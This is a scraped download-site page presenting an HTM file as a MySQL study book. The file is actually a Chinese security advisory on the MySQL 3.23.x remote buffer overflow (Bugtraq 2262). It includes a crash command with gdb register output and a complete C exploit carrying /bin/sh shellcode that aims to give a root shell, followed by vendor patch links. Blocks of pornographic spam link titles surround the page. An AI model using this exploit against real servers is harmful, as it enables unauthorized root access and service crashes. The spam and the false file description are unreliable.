亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? mysql實例-4.htm

?? 很好的數據庫學習圖書詳細說明學習內容我學習后覺得這本書很有用 并且已經用于實踐
?? HTM
字號:
<body bgcolor="#000000"><p><font color="#009900"><B>mysql遠程緩沖區溢出漏洞</B></font></p>
<p><font color="#FFFFFF">受影響的系統: <BR>
  T.C.X DataKonsult MySQL 3.23.30 <BR>
  T.C.X DataKonsult MySQL 3.23.29 <BR>
  T.C.X DataKonsult MySQL 3.23.28 <BR>
  T.C.X DataKonsult MySQL 3.23.27 <BR>
  T.C.X DataKonsult MySQL 3.23.26 <BR>
  T.C.X DataKonsult MySQL 3.23.25 <BR>
  T.C.X DataKonsult MySQL 3.23.24 <BR>
  T.C.X DataKonsult MySQL 3.23.23 <BR>
  不受影響系統: <BR>
  T.C.X DataKonsult MySQL 3.23.31 <BR>
  描述: <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  <BR>
  <BR>
  BUGTRAQ ID :2262 <BR>
  <BR>
  MySQL是一個開放源代碼的自由數據庫軟件。3.23.31以前的版本都存在一個緩沖區 <BR>
  溢出漏洞。 <BR>
  <BR>
  通過使用一個特別長的字符串作為SELECT語句的參數,可能導致mysqld發生緩沖區 <BR>
  溢出。堆棧中的數據可能被覆蓋或修改,攻擊者可能遠程獲取mysqld的運行權限或 <BR>
  使mysqld數據庫崩潰。 <BR>
  <BR>
  &lt;*來源:Joao Gouveia (tharbad@kaotik.org) *&gt; <BR>
  <BR>
  <BR>
  測試程序: <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  <BR>
  警 告 <BR>
  <BR>
  以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負! <BR>
  <BR>
  <BR>
  <BR>
  Joao Gouveia提供了下列測試步驟: <BR>
  <BR>
  &gt; On one terminal: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; spike:/var/mysql # /sbin/init.d/mysql start <BR>
  &gt; Starting service MySQL. <BR>
  &gt; Starting mysqld daemon with databases from /var/mysql <BR>
  &gt; done <BR>
  &gt; spike:/var/mysql # <BR>
  &gt;&lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; On the other terminal: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; jroberto@spike:~ &gt; mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' 
  <BR>
  &gt; Enter password: <BR>
  &gt; (hanged..^C) <BR>
  &gt; &lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; On the first terminal i got: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault 
  <BR>
  &gt; nohup <BR>
  &gt; $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin 
  <BR>
  &gt; g "$@" &gt;&gt;$err_log 2&gt;&amp;1&gt; <BR>
  &gt; Number of processes running now: 0 <BR>
  &gt; mysqld restarted on Fri Jan 12 07:10:54 WET 2001 <BR>
  &gt; mysqld daemon ended <BR>
  &gt; &lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; gdb shows the following: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; (gdb) run <BR>
  &gt; Starting program: /usr/sbin/mysqld <BR>
  &gt; [New Thread 16897 (manager thread)] <BR>
  &gt; [New Thread 16891 (initial thread)] <BR>
  &gt; [New Thread 16898] <BR>
  &gt; /usr/sbin/mysqld: ready for connections <BR>
  &gt; [New Thread 16916] <BR>
  &gt; [Switching to Thread 16916] <BR>
  &gt; <BR>
  &gt; Program received signal SIGSEGV, Segmentation fault. <BR>
  &gt; 0x41414141 in ?? () <BR>
  &gt; (gdb) info all-registers <BR>
  &gt; eax 0x1 1 <BR>
  &gt; ecx 0x68 104 <BR>
  &gt; edx 0x8166947 135686471 <BR>
  &gt; ebx 0x41414141 1094795585 <BR>
  &gt; esp 0xbf5ff408 0xbf5ff408 <BR>
  &gt; ebp 0x41414141 0x41414141 <BR>
  &gt; esi 0x41414141 1094795585 <BR>
  &gt; edi 0x0 0 <BR>
  &gt; eip 0x41414141 0x41414141 <BR>
  &gt; eflags 0x10246 66118 <BR>
  &gt; cs 0x23 35 <BR>
  &gt; ss 0x2b 43 <BR>
  &gt; ds 0x2b 43 <BR>
  &gt; es 0x2b 43 <BR>
  &gt; fs 0x0 0 <BR>
  &gt; gs 0x0 0 <BR>
  &gt; (gdb) <BR>
  &gt; &lt;/quote&gt; <BR>
  <BR>
  Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一個測試程序: <BR>
  <BR>
  #include &lt;stdio.h&gt; <BR>
  <BR>
  #define DEFAULT_OFFSET 0 <BR>
  #define DEFAULT_BUFFER_SIZE 130 <BR>
  #define NOP 0x90 <BR>
  <BR>
  // Our EVIL code... <BR>
  char shellcode[] = <BR>
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>
  <BR>
  unsigned <BR>
  long get_sp(void) { <BR>
  __asm__("movl %esp,%eax"); <BR>
  } <BR>
  <BR>
  // Where it all happens... <BR>
  main(int argc, char *argv[]) <BR>
  { <BR>
  char *buffer, *ptr, tmp[1500]; <BR>
  long *addr_ptr, addr; <BR>
  int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET; <BR>
  <BR>
  printf("\nMySQL [al versions &lt; 3.23.31] Local Exploit by <BR>
  lms@ispgaya.pt\n\n"); <BR>
  if (argc==2) offset=atoi(argv[1]); <BR>
  else <BR>
  printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n"); 
  <BR>
  <BR>
  printf("Trying to allocate memory for buffer (%d bytes)...",bsize); <BR>
  if (!(buffer = malloc(bsize))) { <BR>
  printf("ERROR!\n"); <BR>
  printf("Couldn't allocate memory...\n"); <BR>
  printf("Exiting...\n"); <BR>
  exit(0); <BR>
  } <BR>
  printf("SUCCESS!\n"); <BR>
  addr=get_sp()-offset; <BR>
  printf("Using address : 0x%x\n", addr); <BR>
  printf("Offset : %d\n",offset); <BR>
  printf("Buffer Size : %d\n",bsize); <BR>
  ptr=buffer; <BR>
  addr_ptr=(long *) ptr; <BR>
  for (i=0;i&lt;bsize;i+=4) *(addr_ptr++)=addr; <BR>
  for (i=0;i&lt;bsize/2;i++) buffer[i]=NOP; <BR>
  ptr=buffer+((bsize/2)-(strlen(shellcode)/2)); <BR>
  for (i=0;i&lt;strlen(shellcode);i++) *(ptr++)=shellcode[i]; <BR>
  buffer[bsize-1]='\0'; <BR>
  snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer); <BR>
  printf("Oh k...i have the evil'buffer right here :P\n"); <BR>
  printf("So...[if all went well], prepare to be r00t...\n"); <BR>
  system(tmp); <BR>
  } <BR>
  <BR>
  <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  建議: <BR>
  <BR>
  廠商補丁: <BR>
  <BR>
  NSFOCUS建議您立即升級到MySQL 3.23.31以上版本,它已經解決了這一問題。 <BR>
  廠商地址:http://www.mysql.com/ <BR>
  <BR>
  很多Linux廠商也提供了升級軟件包: <BR>
  <BR>
  【redhat】 <BR>
  <BR>
  Red Hat Linux 7.0: <BR>
  <BR>
  SRPMS: <BR>
  http://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm <BR>
  http://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm <BR>
  <BR>
  alpha: <BR>
  http://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm <BR>
  <BR>
  i386: <BR>
  http://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm <BR>
  <BR>
  【debian】 <BR>
  <BR>
  Debian GNU/Linux 2.2 alias potato <BR>
  - ------------------------------------ <BR>
  <BR>
  Source archives: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz 
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc 
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz 
  <BR>
  <BR>
  Architecture independent: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb 
  <BR>
  <BR>
  Intel ia32 architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb 
  <BR>
  <BR>
  Motorola 680x0 architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb 
  <BR>
  <BR>
  Sun Sparc architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb 
  <BR>
  <BR>
  Alpha architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb 
  <BR>
  <BR>
  PowerPC architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb 
  <BR>
  <BR>
  ARM architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb 
  <BR>
  <BR>
  </font></p>

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美午夜不卡视频| 欧洲在线/亚洲| 欧美丝袜第三区| 久久这里只有精品6| 亚洲情趣在线观看| 激情久久五月天| 日本韩国欧美国产| 中文在线资源观看网站视频免费不卡 | 91视频观看免费| 日韩视频不卡中文| 专区另类欧美日韩| 床上的激情91.| 欧美不卡一二三| 亚洲第一狼人社区| 99这里只有久久精品视频| 精品国产乱码久久久久久老虎 | 久久久国产综合精品女国产盗摄| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆| 日韩电影网1区2区| 欧美亚洲一区三区| 亚洲免费高清视频在线| 成人污视频在线观看| 久久久精品黄色| 六月丁香婷婷久久| 日韩视频123| 久久精品99国产精品| 欧美色手机在线观看| 自拍偷拍国产精品| 色综合久久久久久久久| 中文字幕亚洲一区二区va在线| 国产毛片精品国产一区二区三区| 欧美一区二区福利在线| 美女网站一区二区| 欧美成人一级视频| 精品一区二区三区在线播放视频 | 色噜噜狠狠成人网p站| 国产精品免费人成网站| 精彩视频一区二区三区| 日韩视频免费观看高清完整版在线观看 | 依依成人精品视频| 91网站最新网址| 亚洲黄网站在线观看| 色噜噜狠狠色综合中国| 亚洲国产精品久久久久秋霞影院| 色婷婷精品久久二区二区蜜臀av| 亚洲制服丝袜在线| 91精品国产综合久久久久久 | 亚洲一区二区欧美日韩| 欧美群妇大交群中文字幕| 舔着乳尖日韩一区| 日韩欧美激情四射| 国产精品一二三四| 国产精品盗摄一区二区三区| 色综合久久88色综合天天6| 一区二区免费在线播放| 欧美一区二区黄色| 成人免费高清在线观看| 亚洲在线成人精品| 日韩一区和二区| 高清视频一区二区| 一区二区三区四区乱视频| 777午夜精品免费视频| 九色porny丨国产精品| 国产精品激情偷乱一区二区∴| 91在线免费播放| 美女视频免费一区| 国产精品久久久久aaaa| 欧美巨大另类极品videosbest| 精品一区二区三区在线播放| 亚洲视频每日更新| 日韩午夜激情视频| 色综合久久久久久久久| 激情图片小说一区| 亚洲视频 欧洲视频| 日韩一区国产二区欧美三区| 成人av资源站| 免费观看91视频大全| 国产精品激情偷乱一区二区∴| 欧美日韩国产影片| 成人av电影在线播放| 美女一区二区三区在线观看| 亚洲欧美偷拍另类a∨色屁股| 日韩欧美国产一区二区三区| 色欧美日韩亚洲| 狠狠色丁香久久婷婷综合丁香| 亚洲天堂av一区| 久久久久国产精品人| 欧美视频一区在线| 97久久超碰国产精品电影| 久久精品国产亚洲a| 亚洲一区二区在线免费看| 欧美韩日一区二区三区| 日韩精品一区二区三区四区视频| 色婷婷狠狠综合| 国产寡妇亲子伦一区二区| 日韩影视精彩在线| 亚洲影视资源网| 国产精品亲子乱子伦xxxx裸| 精品久久久久久综合日本欧美| 欧美日本高清视频在线观看| 99re8在线精品视频免费播放| 国产一区二区91| 美女视频黄频大全不卡视频在线播放 | 久久久影视传媒| 日韩欧美一二三区| 91精品国产综合久久婷婷香蕉| 91在线小视频| 99re这里只有精品首页| 丰满岳乱妇一区二区三区| 狠狠色狠狠色综合系列| 精品综合免费视频观看| 日韩国产欧美在线播放| 午夜欧美电影在线观看| 亚洲自拍偷拍欧美| 亚洲午夜在线电影| 亚洲成av人综合在线观看| 亚洲影院免费观看| 亚洲va欧美va国产va天堂影院| 洋洋av久久久久久久一区| 一区二区在线免费观看| 亚洲男女一区二区三区| 亚洲日本在线天堂| 亚洲免费观看高清| 亚洲成人久久影院| 青青草成人在线观看| 美女一区二区三区在线观看| 奇米影视在线99精品| 久久99精品视频| 国产一区二区在线观看视频| 国产高清精品网站| 99久久精品久久久久久清纯| 99久久精品国产一区| 色综合久久中文字幕综合网| 99久久er热在这里只有精品15| 97se亚洲国产综合在线| 在线看国产一区| 欧美日韩国产美| 911精品国产一区二区在线| 精品久久久久av影院| 中文字幕免费在线观看视频一区| 亚洲麻豆国产自偷在线| 一区二区免费看| 日韩av一级片| 粉嫩嫩av羞羞动漫久久久| 色综合久久久久综合| 日韩一级免费观看| 中文字幕一区二区在线播放| 一区二区在线观看视频| 日韩av成人高清| 粉嫩aⅴ一区二区三区四区| 色综合久久久久| 精品国产污污免费网站入口| 中文无字幕一区二区三区| 亚洲乱码国产乱码精品精可以看| 午夜精品久久久久久久蜜桃app| 久久国产乱子精品免费女| 91麻豆国产香蕉久久精品| 欧美精品九九99久久| 国产精品午夜电影| 午夜成人免费视频| 成人免费三级在线| 日韩一级二级三级精品视频| 国产精品美女久久久久久久 | 老司机精品视频在线| 成人av午夜影院| 日韩一区二区影院| 亚洲男同1069视频| 国产一区中文字幕| 欧美日本一区二区在线观看| 久久精品亚洲精品国产欧美| 一区二区三区四区不卡在线 | 91在线观看视频| 精品人在线二区三区| 亚洲第一主播视频| 99re这里都是精品| 欧美韩国日本一区| 九色综合狠狠综合久久| 欧美日韩免费观看一区三区| 久久久久久久久久久久电影| 日韩精品一区第一页| 一本久久a久久精品亚洲| 久久久久国产精品免费免费搜索| 日韩二区三区四区| 在线观看免费亚洲| 中文字幕巨乱亚洲| 国产精品资源网| 精品剧情v国产在线观看在线| 日韩精品亚洲一区二区三区免费| 91国产成人在线| 亚洲欧洲一区二区在线播放| 国产乱淫av一区二区三区| 日韩一区二区三区四区五区六区 | 91蜜桃传媒精品久久久一区二区| 精品国产电影一区二区| 日韩中文字幕区一区有砖一区| 欧美日本免费一区二区三区| 亚洲福利一二三区| 欧美日韩一区二区三区四区五区| 综合久久综合久久| 91小视频免费看|